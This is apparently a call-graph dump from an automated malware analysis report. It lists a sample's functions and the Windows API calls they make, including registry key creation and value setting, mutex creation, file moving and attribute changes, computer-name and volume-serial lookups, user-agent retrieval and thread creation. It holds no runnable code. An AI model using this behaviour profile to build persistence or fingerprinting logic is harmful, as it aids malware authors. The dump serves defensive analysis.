8861a 2 API calls 13384->13386 13385->13387 13390 8a63b CreateFileW 13385->13390 13386->13388 13387->13382 13387->13384 13389->13370 13390->13385 13525 82454 13526 8246a 13525->13526 13535 82509 13525->13535 13527 8b4a3 2 API calls 13526->13527 13529 82477 13527->13529 13528 894b7 2 API calls 13530 82516 13528->13530 13547 89569 13529->13547 13533 89256 2 API calls 13534 82485 13533->13534 13534->13535 13536 8109a RtlAllocateHeap 13534->13536 13535->13528 13537 82498 13536->13537 13538 892e5 2 API calls 13537->13538 13539 824b0 13538->13539 13540 885d5 2 API calls 13539->13540 13541 824be 13540->13541 13542 824fa 13541->13542 13544 8a911 4 API calls 13541->13544 13543 8861a 2 API calls 13542->13543 13543->13535 13545 824dd 13544->13545 13546 8861a 2 API calls 13545->13546 13546->13542 13548 89572 13547->13548 13550 8247e 13547->13550 13551 88604 RtlAllocateHeap 13548->13551 13550->13533 13551->13550 9948 85cec 9965 9249b 9948->9965 9952 85d08 9971 88f78 9952->9971 9964 85d6c 9966 924b3 GetModuleHandleA 9965->9966 9968 85d03 9965->9968 9969 924ce 9966->9969 9967 92547 LoadLibraryA 9967->9968 9967->9969 9970 885ef HeapCreate 9968->9970 9969->9967 9969->9968 9970->9952 10032 88604 RtlAllocateHeap 9971->10032 9973 85d0d 9974 85eb6 9973->9974 10033 8e1bc 9974->10033 9977 8e1bc 7 API calls 9978 85ee3 9977->9978 9979 8e1bc 7 API calls 9978->9979 9980 85efc 9979->9980 9981 8e1bc 7 API calls 9980->9981 9982 85f15 9981->9982 9983 8e1bc 7 API calls 9982->9983 9984 85f30 9983->9984 9985 8e1bc 7 API calls 9984->9985 9986 85f49 9985->9986 9987 8e1bc 7 API calls 9986->9987 9988 85f62 9987->9988 9989 8e1bc 7 API calls 9988->9989 9990 85d26 9989->9990 9991 8cf84 GetCurrentProcess 9990->9991 10075 8ba05 9991->10075 9993 8cf9d GetModuleFileNameW 9994 8cfbb 9993->9994 9995 8cfd3 memset GetVersionExA GetCurrentProcessId 9994->9995 10082 8e3b6 9995->10082 9997 8d004 10087 8e3f1 9997->10087 10000 8a86d 10001 8a886 10000->10001 10106 8a7bc 10001->10106 10004 8b337 10006 8b34a 10004->10006 10005 85d58 memset 10008 85c26 10005->10008 10006->10005 10007 8b363 CloseHandle 10006->10007 10007->10005 10126 89b43 10008->10126 10011 85c51 10011->9964 10012 85c69 10178 85d7d 10012->10178 10016 85c78 10018 85c7d 10016->10018 10019 85ccc 10016->10019 10017 85cc7 10211 85aff 10017->10211 10022 85ce8 10018->10022 10025 8a86d 5 API calls 10018->10025 10021 85cc5 10019->10021 10019->10022 10224 8f8cc 10019->10224 10245 85a61 RtlAddVectoredExceptionHandler 10021->10245 10022->9964 10026 85c9d 10025->10026 10027 8b337 CloseHandle 10026->10027 10028 85ca5 10027->10028 10187 85974 10028->10187 10032->9973 10043 895c7 10033->10043 10036 8e1de GetModuleHandleA 10038 8e1ed 10036->10038 10037 8e1e6 LoadLibraryA 10037->10038 10039 8e1fb 10038->10039 10046 8e171 10038->10046 10051 885c2 10039->10051 10055 884ab 10043->10055 10060 88604 RtlAllocateHeap 10046->10060 10048 8e1b2 10048->10039 10049 8e183 10049->10048 10061 8dfad 10049->10061 10052 885ca 10051->10052 10053 85eca 10051->10053 10067 8861a 10052->10067 10053->9977 10056 884c1 10055->10056 10058 884e2 10055->10058 10056->10058 10059 88604 RtlAllocateHeap 10056->10059 10058->10036 10058->10037 10059->10058 10060->10049 10062 8e021 10061->10062 10063 8dfc6 10061->10063 10062->10049 10063->10062 10064 8e079 LoadLibraryA 10063->10064 10064->10062 10065 8e087 GetProcAddress 10064->10065 10065->10062 10066 8e093 10065->10066 10066->10062 10068 88666 10067->10068 10069 88624 10067->10069 10068->10053 10069->10068 10072 8874f 10069->10072 10073 88758 memset 10072->10073 10074 88654 HeapFree 10072->10074 10073->10074 10074->10068 10077 8ba1d 10075->10077 10076 8ba21 10076->9993 10077->10076 10091 8b998 GetTokenInformation 10077->10091 10080 8ba3e 10080->9993 10081 8ba52 CloseHandle 10081->10080 10083 8e3cd 10082->10083 10084 8e3ed 10083->10084 10101 891e3 10083->10101 10084->9997 10086 8e3da 10086->9997 10089 8e410 10087->10089 10088 85d2b 10088->10000 10089->10088 10090 891e3 RtlAllocateHeap 10089->10090 10090->10088 10092 8b9ba GetLastError 10091->10092 10093 8b9d7 10091->10093 10092->10093 10094 8b9c5 10092->10094 10093->10080 10093->10081 10100 88604 RtlAllocateHeap 10094->10100 10096 8b9cd 10096->10093 10097 8b9db GetTokenInformation 10096->10097 10097->10093 10098 8b9f0 10097->10098 10099 8861a 2 API calls 10098->10099 10099->10093 10100->10096 10102 891ec 10101->10102 10104 891fe 10101->10104 10105 88604 RtlAllocateHeap 10102->10105 10104->10086 10105->10104 10115 922d3 10106->10115 10108 8a7d4 10109 895c7 RtlAllocateHeap 10108->10109 10110 8a7fe 10109->10110 10119 89601 10110->10119 10112 8a85c 10113 885c2 2 API calls 10112->10113 10114 85d50 10113->10114 10114->10004 10117 922de 10115->10117 10118 922fd 10115->10118 10117->10118 10123 9242d 10117->10123 10118->10108 10120 8874f memset 10119->10120 10121 89615 _vsnprintf 10120->10121 10122 8962f 10121->10122 10122->10112 10124 9243c 10123->10124 10125 92480 _ftol2_sse 10124->10125 10125->10117 10248 88604 RtlAllocateHeap 10126->10248 10128 89b6d 10129 85c45 10128->10129 10249 8b5f6 10128->10249 10129->10011 10129->10012 10167 8fb19 10129->10167 10132 895c7 RtlAllocateHeap 10133 89bb0 10132->10133 10134 89ceb 10133->10134 10138 89bdc 10133->10138 10135 89d3c 10134->10135 10136 89cfd 10134->10136 10137 89292 2 API calls 10135->10137 10140 89292 2 API calls 10136->10140 10162 89ce7 10136->10162 10137->10162 10138->10162 10259 89292 10138->10259 10139 885c2 2 API calls 10141 89d5c RegOpenKeyExA 10139->10141 10140->10162 10142 89d76 RegCreateKeyA 10141->10142 10151 89db2 10141->10151 10144 89d8d 10142->10144 10142->10151 10145 8861a 2 API calls 10144->10145 10146 89d9b memset 10145->10146 10147 8861a 2 API calls 10146->10147 10147->10151 10149 89ca1 10155 89292 2 API calls 10149->10155 10153 8861a 2 API calls 10151->10153 10153->10129 10156 89cc8 10155->10156 10161 8861a 2 API calls 10156->10161 10161->10162 10162->10139 10164 8861a 2 API calls 10165 89c96 10164->10165 10166 8861a 2 API calls 10165->10166 10166->10149 10292 88604 RtlAllocateHeap 10167->10292 10169 8fb20 10170 8fb2a 10169->10170 10293 8a6a9 10169->10293 10170->10012 10173 8fb6e 10173->10012 10175 8fb55 10176 8f8cc 26 API calls 10175->10176 10177 8fb6b 10176->10177 10177->10012 10179 8a86d 5 API calls 10178->10179 10180 85d9a 10179->10180 10181 85c6e 10180->10181 10182 85974 9 API calls 10180->10182 10181->10016 10181->10017 10183 85dd4 10182->10183 10183->10181 10349 89ebb 10183->10349 10186 85de6 lstrcmpiW 10186->10181 10188 8a86d 5 API calls 10187->10188 10189 8598d 10188->10189 10190 8599a 10189->10190 10191 89292 2 API calls 10189->10191 10192 859bd 10191->10192 10382 8590c 10192->10382 10194 8861a 2 API calls 10195 859fd 10194->10195 10199 85bc4 10195->10199 10196 859cd 10197 8590c 3 API calls 10196->10197 10198 859f1 10196->10198 10197->10198 10198->10194 10200 89ebb 7 API calls 10199->10200 10201 85bce 10200->10201 10202 85bdc lstrcmpiW 10201->10202 10203 85bd7 10201->10203 10204 85bf2 10202->10204 10205 85c14 10202->10205 10203->10021 10387 89f6c 10204->10387 10207 8861a 2 API calls 10205->10207 10207->10203 10209 85c0d 10391 8b1b1 SetFileAttributesW memset 10209->10391 10438 88604 RtlAllocateHeap 10211->10438 10213 85b11 10214 85b24 GetDriveTypeW 10213->10214 10215 85b55 10213->10215 10214->10215 10439 85a7b 10215->10439 10217 85b71 10218 85ba1 10217->10218 10456 84d6d 10217->10456 10547 8a39e 10218->10547 10222 8a39e 2 API calls 10223 85bbd 10222->10223 10223->10019 10225 8109a RtlAllocateHeap 10224->10225 10226 8f8db 10225->10226 11115 861b4 memset 10226->11115 10229 885d5 2 API calls 10230 8f901 10229->10230 10244 8f978 10230->10244 11132 89e66 10230->11132 10234 8f92c 10235 8109a RtlAllocateHeap 10234->10235 10234->10244 10236 8f93e 10235->10236 10237 89640 2 API calls 10236->10237 10238 8f94d 10237->10238 10239 8a911 4 API calls 10238->10239 10240 8f95e 10239->10240 10241 8f96c 10240->10241 11138 8a239 10240->11138 10243 8861a 2 API calls 10241->10243 10243->10244 10244->10021 11146 85631 10245->11146 10248->10128 10250 8b60f 10249->10250 10251 9242d _ftol2_sse 10250->10251 10252 8b61f 10251->10252 10253 895c7 RtlAllocateHeap 10252->10253 10255 8b62e 10253->10255 10254 8b66a 10256 885c2 2 API calls 10254->10256 10255->10254 10257 9242d _ftol2_sse 10255->10257 10258 89b91 10256->10258 10257->10255 10258->10132 10260 892a4 10259->10260 10284 88604 RtlAllocateHeap 10260->10284 10262 892c1 10263 892de 10262->10263 10264 892cd lstrcatA 10262->10264 10263->10144 10263->10149 10265 895e1 10263->10265 10264->10262 10285 88531 10265->10285 10267 895fc 10268 892e5 10267->10268 10270 892f7 10268->10270 10290 88604 RtlAllocateHeap 10270->10290 10271 89316 10272 89333 10271->10272 10273 89322 lstrcatW 10271->10273 10274 885d5 10272->10274 10273->10271 10275 885eb 10274->10275 10276 885e3 10274->10276 10278 89256 10275->10278 10277 8861a 2 API calls 10276->10277 10277->10275 10279 8925f 10278->10279 10280 8928c 10278->10280 10291 88604 RtlAllocateHeap 10279->10291 10280->10164 10282 89271 10282->10280 10283 89279 MultiByteToWideChar 10282->10283 10283->10280 10284->10262 10287 8854d 10285->10287 10289 88604 RtlAllocateHeap 10287->10289 10288 88581 10288->10267 10288->10288 10289->10288 10290->10271 10291->10282 10292->10169 10294 8a6bb 10293->10294 10295 8a6c2 10293->10295 10294->10173 10306 8f9bf 10294->10306 10330 8a63b CreateFileW 10295->10330 10297 8a6c9 10297->10294 10299 8a73d 10297->10299 10331 88604 RtlAllocateHeap 10297->10331 10299->10294 10300 8861a 2 API calls 10299->10300 10300->10294 10301 8a72d ReadFile 10301->10299 10302 8a6f0 10301->10302 10302->10299 10302->10301 10303 8a75e 10302->10303 10303->10299 10304 8a763 CloseHandle 10303->10304 10304->10294 10332 88604 RtlAllocateHeap 10306->10332 10308 8f9d2 10310 8fabc 10308->10310 10317 8fb10 10308->10317 10333 8109a 10308->10333 10312 8fae5 Sleep 10310->10312 10313 8fb06 10310->10313 10336 8a77d 10310->10336 10312->10310 10312->10313 10315 8861a 2 API calls 10313->10315 10315->10317 10316 895e1 RtlAllocateHeap 10318 8fa2c 10316->10318 10317->10175 10319 892e5 2 API calls 10318->10319 10320 8fa49 10319->10320 10321 8a6a9 6 API calls 10320->10321 10322 8fa56 10321->10322 10323 885d5 2 API calls 10322->10323 10324 8fa62 10323->10324 10325 885d5 2 API calls 10324->10325 10327 8fa6b 10325->10327 10326 8861a 2 API calls 10328 8fab1 10326->10328 10327->10326 10329 8861a 2 API calls 10328->10329 10329->10310 10330->10297 10331->10302 10332->10308 10334 88531 RtlAllocateHeap 10333->10334 10335 810b5 10334->10335 10335->10316 10343 8a5f7 CreateFileW 10336->10343 10339 8a792 10339->10310 10342 8a7ae CloseHandle 10342->10339 10344 8a61c 10343->10344 10344->10339 10345 8a65c 10344->10345 10346 8a69e 10345->10346 10347 8a66f WriteFile 10345->10347 10346->10339 10346->10342 10347->10346 10348 8a693 10347->10348 10348->10346 10348->10347 10352 89f95 10349->10352 10353 89fbe 10352->10353 10364 89b0e 10353->10364 10355 89fc9 10358 85de2 10355->10358 10367 8be9b RegOpenKeyExA 10355->10367 10357 8861a 2 API calls 10357->10358 10358->10181 10358->10186 10359 8a070 10361 8861a 2 API calls 10359->10361 10360 89ffd 10360->10359 10363 8a095 10360->10363 10376 88669 10360->10376 10361->10363 10363->10357 10379 88604 RtlAllocateHeap 10364->10379 10366 89b1a 10366->10355 10366->10366 10368 8bec9 RegQueryValueExA 10367->10368 10371 8bec5 10367->10371 10369 8bee8 10368->10369 10375 8bf15 10368->10375 10380 88604 RtlAllocateHeap 10369->10380 10371->10360 10372 8bf26 RegCloseKey 10372->10371 10373 8bef2 10374 8bef9 RegQueryValueExA 10373->10374 10373->10375 10374->10375 10375->10371 10375->10372 10381 88604 RtlAllocateHeap 10376->10381 10378 8867a 10378->10359 10379->10366 10380->10373 10381->10378 10383 8591c CreateMutexA 10382->10383 10386 85917 10382->10386 10384 8593f GetLastError 10383->10384 10385 85934 GetLastError 10383->10385 10384->10386 10385->10386 10386->10196 10388 89f7c 10387->10388 10404 8a0ab 10388->10404 10392 8a77d 3 API calls 10391->10392 10393 8b1ec 10392->10393 10394 8b1ff 10393->10394 10395 9242d _ftol2_sse 10393->10395 10394->10205 10396 8b21b 10395->10396 10422 89640 10396->10422 10399 892e5 2 API calls 10400 8b23d 10399->10400 10400->10394 10426 8b0de 10400->10426 10403 8861a 2 API calls 10403->10394 10405 85c08 10404->10405 10406 8a0c8 10404->10406 10405->10205 10405->10209 10406->10405 10407 9242d _ftol2_sse 10406->10407 10408 8a112 10407->10408 10421 88604 RtlAllocateHeap 10408->10421 10410 8a126 10410->10405 10411 922d3 _ftol2_sse 10410->10411 10412 8a168 10411->10412 10413 89b0e RtlAllocateHeap 10412->10413 10414 8a1b4 10413->10414 10416 8a1c8 RegOpenKeyExA 10414->10416 10420 8a21e 10414->10420 10415 8861a 2 API calls 10415->10405 10417 8a1ea RegSetValueExA 10416->10417 10418 8a1e5 10416->10418 10417->10418 10419 8861a 2 API calls 10418->10419 10419->10420 10420->10415 10421->10410 10423 8874f memset 10422->10423 10424 89654 _vsnwprintf 10423->10424 10425 89671 10424->10425 10425->10399 10427 8b101 10426->10427 10428 8b109 memset 10427->10428 10437 8b178 10427->10437 10429 895e1 RtlAllocateHeap 10428->10429 10430 8b125 10429->10430 10431 9242d _ftol2_sse 10430->10431 10432 8b141 10431->10432 10433 89640 2 API calls 10432->10433 10434 8b157 10433->10434 10435 885d5 2 API calls 10434->10435 10436 8b160 MoveFileW 10435->10436 10436->10437 10437->10403 10438->10213 10555 81080 10439->10555 10444 885c2 2 API calls 10445 85ab7 10444->10445 10446 85af7 10445->10446 10447 81080 RtlAllocateHeap 10445->10447 10446->10217 10448 85ac5 10447->10448 10564 88910 10448->10564 10451 85ae1 10453 885c2 2 API calls 10451->10453 10454 85aeb 10453->10454 10455 8861a 2 API calls 10454->10455 10455->10446 10457 84dee 10456->10457 10458 84d91 10456->10458 10664 8b7a8 memset GetComputerNameW lstrcpynW 10457->10664 10460 895c7 RtlAllocateHeap 10458->10460 10462 84d9b 10460->10462 10461 84dfc 10463 8a86d 5 API calls 10461->10463 10464 895c7 RtlAllocateHeap 10462->10464 10465 84e08 10463->10465 10466 84dab 10464->10466 10674 8a471 CreateMutexA 10465->10674 10466->10457 10468 84db9 GetModuleHandleA 10466->10468 10470 84dcd 10468->10470 10471 84dc6 GetModuleHandleA 10468->10471 10469 84e14 10472 84e1d 10469->10472 10473 8e1bc 7 API calls 10469->10473 10475 885c2 2 API calls 10470->10475 10471->10470 10472->10218 10474 84e37 10473->10474 10476 895e1 RtlAllocateHeap 10474->10476 10477 84dde 10475->10477 10478 84e48 10476->10478 10479 885c2 2 API calls 10477->10479 10480 892e5 2 API calls 10478->10480 10481 84de7 10479->10481 10482 84e60 10480->10482 10481->10457 10481->10472 10483 885d5 2 API calls 10482->10483 10484 84e73 10483->10484 10678 8b269 GetFileAttributesW 10484->10678 10486 84e7b 10487 84e9c 10486->10487 10785 8896f 10486->10785 10488 8861a 2 API calls 10487->10488 10490 84ead 10488->10490 10679 84a0b memset 10490->10679 10491 84e8f 10491->10487 10494 8a2e3 8 API calls 10491->10494 10494->10487 10496 895e1 RtlAllocateHeap 10498 851fd 10496->10498 10499 892e5 2 API calls 10498->10499 10500 85215 10499->10500 10501 85245 10500->10501 10806 8b269 GetFileAttributesW 10500->10806 10504 885d5 2 API calls 10501->10504 10502 8e2c6 64 API calls 10506 84f64 10502->10506 10507 85251 lstrcpynW lstrcpynW 10504->10507 10505 85229 10510 8861a 2 API calls 10505->10510 10508 84fb3 10506->10508 10513 85082 10506->10513 10541 851f1 10506->10541 10509 85296 10507->10509 10515 84fbc 10508->10515 10508->10541 10511 8861a 2 API calls 10509->10511 10510->10501 10512 852a8 10511->10512 10514 8861a 2 API calls 10512->10514 10513->10541 10749 8fc1f 10513->10749 10514->10472 10805 88604 RtlAllocateHeap 10515->10805 10518 85006 10518->10472 10520 895e1 RtlAllocateHeap 10518->10520 10522 8501f 10520->10522 10524 89640 2 API calls 10522->10524 10523 85110 10526 8109a RtlAllocateHeap 10523->10526 10523->10541 10525 85052 10524->10525 10527 885d5 2 API calls 10525->10527 10528 85129 10526->10528 10529 8505c 10527->10529 10762 8902d 10528->10762 10531 8a911 4 API calls 10529->10531 10541->10496 10548 85bb5 10547->10548 10549 8a3ad 10547->10549 10548->10222 10550 8a3d2 10549->10550 10551 8861a 2 API calls 10549->10551 10552 8861a 2 API calls 10550->10552 10551->10549 10553 8a3dd 10552->10553 10554 8861a 2 API calls 10553->10554 10554->10548 10556 884ab RtlAllocateHeap 10555->10556 10557 81096 10556->10557 10558 8a51a 10557->10558 10559 8a538 10558->10559 10560 9242d _ftol2_sse 10559->10560 10561 8a580 10559->10561 10563 85aa7 10559->10563 10560->10559 10562 88669 RtlAllocateHeap 10561->10562 10561->10563 10562->10563 10563->10444 10565 8891f 10564->10565 10571 85ad4 10564->10571 10583 88604 RtlAllocateHeap 10565->10583 10567 88929 10567->10571 10584 88815 10567->10584 10570 8861a 2 API calls 10570->10571 10571->10451 10572 8a2e3 10571->10572 10619 88a90 10572->10619 10576 8a397 10576->10451 10577 8a38f 10634 88cc0 10577->10634 10580 8a2fd 10580->10576 10580->10577 10581 88698 3 API calls 10580->10581 10625 89749 10580->10625 10630 891a6 10580->10630 10581->10580 10583->10567 10594 88604 RtlAllocateHeap 10584->10594 10586 888d6 10588 8861a 2 API calls 10586->10588 10589 88837 10586->10589 10587 8882a 10587->10586 10587->10589 10595 8ebf0 10587->10595 10588->10589 10589->10570 10589->10571 10592 888f0 10593 8861a 2 API calls 10592->10593 10593->10589 10594->10587 10610 88604 RtlAllocateHeap 10595->10610 10597 8ec14 10598 8ed7f 10597->10598 10611 88604 RtlAllocateHeap 10597->10611 10600 8861a 2 API calls 10598->10600 10602 8eda5 10600->10602 10601 8ec2c 10601->10598 10612 88604 RtlAllocateHeap 10601->10612 10604 8861a 2 API calls 10602->10604 10605 8edb3 10604->10605 10606 888cf 10605->10606 10607 8861a 2 API calls 10605->10607 10606->10586 10606->10592 10607->10606 10608 8ec42 10608->10598 10613 88698 10608->10613 10610->10597 10611->10601 10612->10608 10618 88604 RtlAllocateHeap 10613->10618 10615 886d5 10615->10608 10616 886ad 10616->10615 10617 8861a 2 API calls 10616->10617 10617->10615 10618->10616 10622 88ab3 10619->10622 10620 88604 RtlAllocateHeap 10620->10622 10621 88be7 10624 88604 RtlAllocateHeap 10621->10624 10622->10620 10622->10621 10623 8861a 2 API calls 10622->10623 10623->10622 10624->10580 10626 8974b 10625->10626 10626->10626 10627 8978c SetLastError 10626->10627 10628 89780 SetLastError 10626->10628 10629 89799 10627->10629 10628->10629 10629->10580 10631 891c7 10630->10631 10632 891b1 10630->10632 10631->10580 10646 88604 RtlAllocateHeap 10632->10646 10635 88d57 10634->10635 10637 88ccf 10634->10637 10635->10576 10636 88d09 10638 88d19 10636->10638 10647 88de5 10636->10647 10637->10635 10637->10636 10639 8861a 2 API calls 10637->10639 10641 88d34 10638->10641 10643 8861a 2 API calls 10638->10643 10639->10637 10642 88d4a 10641->10642 10644 8861a 2 API calls 10641->10644 10645 8861a 2 API calls 10642->10645 10643->10641 10644->10642 10645->10635 10646->10631 10658 88604 RtlAllocateHeap 10647->10658 10649 88e1e 10651 88e61 10649->10651 10657 88e28 10649->10657 10659 8879d 10649->10659 10652 8a5f7 CreateFileW 10651->10652 10653 88f39 10652->10653 10654 8a65c WriteFile 10653->10654 10655 88f40 10653->10655 10654->10655 10656 8861a 2 API calls 10655->10656 10656->10657 10657->10638 10658->10649 10660 9242d _ftol2_sse 10659->10660 10663 887b6 10660->10663 10661 887e3 10661->10651 10662 9242d _ftol2_sse 10662->10663 10663->10661 10663->10662 10665 895e1 RtlAllocateHeap 10664->10665 10666 8b7ff GetVolumeInformationW 10665->10666 10667 885d5 2 API calls 10666->10667 10668 8b834 10667->10668 10669 89640 2 API calls 10668->10669 10670 8b855 lstrcatW 10669->10670 10807 8c392 10670->10807 10673 8b87b 10673->10461 10675 8a48b GetLastError 10674->10675 10676 8a495 GetLastError 10674->10676 10677 8a4a2 10675->10677 10676->10677 10677->10469 10678->10486 10681 84a41 10679->10681 10680 84a76 10682 8b7a8 10 API calls 10680->10682 10686 84ae2 10680->10686 10681->10680 10809 82ba4 10681->10809 10684 84a8d 10682->10684 10825 8b67d 10684->10825 10686->10541 10743 8e2c6 10686->10743 10744 8e2fa 10743->10744 10745 84f40 10744->10745 11017 88604 RtlAllocateHeap 10744->11017 11018 84905 10744->11018 10745->10502 10745->10506 10750 850fa 10749->10750 10751 8fc43 10749->10751 10750->10541 10761 88604 RtlAllocateHeap 10750->10761 10752 88669 RtlAllocateHeap 10751->10752 10753 8fc4d 10752->10753 10753->10750 10754 8fc87 10753->10754 10755 8a77d 3 API calls 10753->10755 10756 860df 4 API calls 10754->10756 10760 8fc8e 10754->10760 10755->10754 10758 8fcac 10756->10758 10757 8861a 2 API calls 10757->10750 10758->10760 11077 8f7e3 10758->11077 10760->10757 10761->10523 10763 8903d 10762->10763 10763->10763 10764 9242d _ftol2_sse 10763->10764 10765 89058 10764->10765 11113 88604 RtlAllocateHeap 10785->11113 10787 88990 10788 889a1 lstrcpynW 10787->10788 10795 8899a 10787->10795 10789 88a14 10788->10789 10790 889c4 10788->10790 11114 88604 RtlAllocateHeap 10789->11114 10792 8a6a9 6 API calls 10790->10792 10794 889d0 10792->10794 10793 88a1f 10793->10795 10796 88a39 10793->10796 10799 8861a 2 API calls 10793->10799 10794->10796 10797 88815 3 API calls 10794->10797 10795->10491 10798 88a61 10796->10798 10802 8861a 2 API calls 10796->10802 10800 889ea 10797->10800 10803 8861a 2 API calls 10798->10803 10799->10796 10800->10793 10801 889f0 10800->10801 10804 8861a 2 API calls 10801->10804 10802->10798 10803->10795 10804->10795 10805->10518 10806->10505 10808 8b867 CharUpperBuffW 10807->10808 10808->10673 10810 82bc0 10809->10810 10811 8109a RtlAllocateHeap 10810->10811 10824 82c5c 10810->10824 10812 82bd3 10811->10812 10813 892e5 2 API calls 10812->10813 10814 82be5 10813->10814 10815 885d5 2 API calls 10814->10815 10816 82bf0 10815->10816 10817 8109a RtlAllocateHeap 10816->10817 10818 82bfa 10817->10818 10972 8bf37 RegOpenKeyExW 10818->10972 10821 885d5 2 API calls 10822 82c16 10821->10822 10823 8861a 2 API calls 10822->10823 10823->10824 10824->10680 10826 8b698 10825->10826 10827 895c7 RtlAllocateHeap 10826->10827 10828 8b6a2 10827->10828 10829 9242d _ftol2_sse 10828->10829 10832 8b6b7 10829->10832 10830 8b6ed 10831 885c2 2 API calls 10830->10831 10833 84a9d 10831->10833 10832->10830 10834 9242d _ftol2_sse 10832->10834 10835 849c7 10833->10835 10834->10832 10836 89256 2 API calls 10835->10836 10837 849d2 10836->10837 10838 895e1 RtlAllocateHeap 10837->10838 10839 849e1 10838->10839 10973 8bf6c RegQueryValueExW 10972->10973 10975 82c08 10972->10975 10974 8bf8c 10973->10974 10973->10975 10982 88604 RtlAllocateHeap 10974->10982 10975->10821 10977 8bf94 10977->10975 10978 8bf9e RegQueryValueExW 10977->10978 10979 8bfba 10978->10979 10980 8bfdd RegCloseKey 10978->10980 10980->10975 10982->10977 11017->10744 11019 84928 11018->11019 11020 84995 Sleep 11019->11020 11021 84a0b 58 API calls 11019->11021 11020->10744 11023 84948 11021->11023 11022 84986 11036 847ca 11022->11036 11023->11020 11023->11022 11026 8ad44 11023->11026 11027 8ad65 11026->11027 11032 8ad5e 11026->11032 11028 8ad79 11027->11028 11029 8ad71 GetLastError 11027->11029 11030 8b998 6 API calls 11028->11030 11029->11032 11031 8ad8b 11030->11031 11031->11032 11033 8adea 11031->11033 11034 8ada2 memset 11031->11034 11032->11023 11035 8861a 2 API calls 11033->11035 11034->11033 11035->11032 11037 860df 4 API calls 11036->11037 11038 847ef 11037->11038 11039 847fb 11038->11039 11040 8109a RtlAllocateHeap 11038->11040 11039->11020 11041 8481a 11040->11041 11042 892e5 2 API calls 11041->11042 11043 8482c 11042->11043 11044 885d5 2 API calls 11043->11044 11078 8f7fe 11077->11078 11079 8f883 11077->11079 11080 8109a RtlAllocateHeap 11078->11080 11081 8109a RtlAllocateHeap 11079->11081 11113->10787 11114->10793 11144 88604 RtlAllocateHeap 11115->11144 11117 861ef 11118 86360 11117->11118 11145 88604 RtlAllocateHeap 11117->11145 11118->10229 11120 86209 11120->11118 11121 86217 RegOpenKeyExW 11120->11121 11122 8626f 11121->11122 11129 8623a 11121->11129 11123 86339 RegCloseKey 11122->11123 11124 86344 11122->11124 11123->11124 11125 8861a 2 API calls 11124->11125 11126 86352 11125->11126 11127 8861a 2 API calls 11126->11127 11127->11118 11128 8628d memset memset 11128->11129 11129->11122 11129->11128 11130 86315 11129->11130 11131 8b1b1 13 API calls 11130->11131 11131->11129 11133 89f95 7 API calls 11132->11133 11134 89e87 11133->11134 11135 89e9e 11134->11135 11136 8861a 2 API calls 11134->11136 11135->10244 11137 88604 RtlAllocateHeap 11135->11137 11136->11135 11137->10234 11139 8a245 11138->11139 11140 89b0e RtlAllocateHeap 11139->11140 11142 8a275 11140->11142 11141 8a2da 11141->10241 11142->11141 11143 8861a 2 API calls 11142->11143 11143->11141 11144->11117 11145->11120 11147 89e66 7 API calls 11146->11147 11148 85642 11147->11148 11149 8980c GetSystemTimeAsFileTime 11148->11149 11184 856c0 11148->11184 11150 8565b 11149->11150 11151 89f06 6 API calls 11150->11151 11152 8566f 11151->11152 11153 89f06 6 API calls 11152->11153 11154 85685 11153->11154 11185 8e4c1 11154->11185 11157 8a86d 5 API calls 11158 856a4 11157->11158 11159 856c8 CreateMutexA 11158->11159 11158->11184 11160 856df 11159->11160 11163 856e9 11159->11163 11192 88604 RtlAllocateHeap 11160->11192 11193 8153b CreateMutexA 11163->11193 11166 85715 11220 83017 11166->11220 11184->10022 11186 8e1bc 7 API calls 11185->11186 11187 8e4d3 11186->11187 11188 8e1bc 7 API calls 11187->11188 11189 8e4ec 11188->11189 11287 8e450 11189->11287 11191 8568d 11191->11157 11192->11163 11194 81558 CreateMutexA 11193->11194 11195 815ad 11193->11195 11194->11195 11196 8156e 11194->11196 11208 898ee 11195->11208 11197 81080 RtlAllocateHeap 11196->11197 11198 81578 11197->11198 11198->11195 11199 891a6 RtlAllocateHeap 11198->11199 11200 8158c 11199->11200 11201 885c2 2 API calls 11200->11201 11202 81599 11201->11202 11302 88604 RtlAllocateHeap 11202->11302 11204 815a3 11204->11195 11303 88604 RtlAllocateHeap 11204->11303 11206 815c4 11206->11195 11207 8e1bc 7 API calls 11206->11207 11207->11195 11212 8990c 11208->11212 11209 89910 11209->11166 11210 8996c 11213 8997d 11210->11213 11308 88604 RtlAllocateHeap 11210->11308 11212->11209 11212->11210 11304 8984a 11212->11304 11213->11209 11214 8a471 3 API calls 11213->11214 11216 899e2 CreateThread 11214->11216 11217 89a56 SetThreadPriority 11216->11217 11218 89a1f 11216->11218 11309 898a6 11216->11309 11217->11209 11218->11209 11219 8861a 2 API calls 11218->11219 11219->11209 11221 83025 11220->11221 11223 8302a 11220->11223 11601 8bb20 11221->11601 11224 831c2 11223->11224 11225 8c292 6 API calls 11224->11225 11226 831dd 11225->11226 11227 831e6 11226->11227 11608 88604 RtlAllocateHeap 11226->11608 11239 829b1 11227->11239 11229 831fa 11238 83204 11229->11238 11609 8bd10 11229->11609 11232 8861a 2 API calls 11232->11227 11234 83263 11615 8bc7a 11234->11615 11237 898ee 66 API calls 11237->11238 11238->11232 11240 89e66 7 API calls 11239->11240 11241 829cf 11240->11241 11622 828fb 11241->11622 11244 828fb 3 API calls 11245 829f8 11244->11245 11246 89ea5 7 API calls 11245->11246 11247 82a03 11246->11247 11248 893be RtlAllocateHeap 11247->11248 11255 82a4c 11247->11255 11249 82a1b 11248->11249 11250 82a37 11249->11250 11626 82a53 11249->11626 11252 894b7 2 API calls 11250->11252 11253 82a42 11252->11253 11254 8861a 2 API calls 11253->11254 11254->11255 11256 83bb2 11255->11256 11634 84145 11256->11634 11258 83be0 11259 83c42 11260 83bd5 11260->11258 11260->11259 11288 8e49a 11287->11288 11289 8e45e 11287->11289 11291 895c7 RtlAllocateHeap 11288->11291 11301 88604 RtlAllocateHeap 11289->11301 11293 8e4a4 11291->11293 11292 8e46f ObtainUserAgentString 11294 8e4bd 11292->11294 11295 8e487 11292->11295 11296 891a6 RtlAllocateHeap 11293->11296 11294->11191 11298 8861a 2 API calls 11295->11298 11297 8e4b0 11296->11297 11299 885c2 2 API calls 11297->11299 11300 8e493 11298->11300 11299->11294 11300->11191 11301->11292 11302->11204 11303->11206 11306 89854 11304->11306 11305 8861a 2 API calls 11307 89879 11305->11307 11306->11305 11306->11307 11307->11212 11308->11213 11310 898ba 11309->11310 11311 898c2 CloseHandle 11310->11311 11312 898be 11310->11312 11318 82eda 11311->11318 11325 832a1 11311->11325 11340 825e1 11311->11340 11313 898d3 11313->11312 11314 8984a 2 API calls 11313->11314 11314->11312 11319 82ef0 memset 11318->11319 11320 8902d 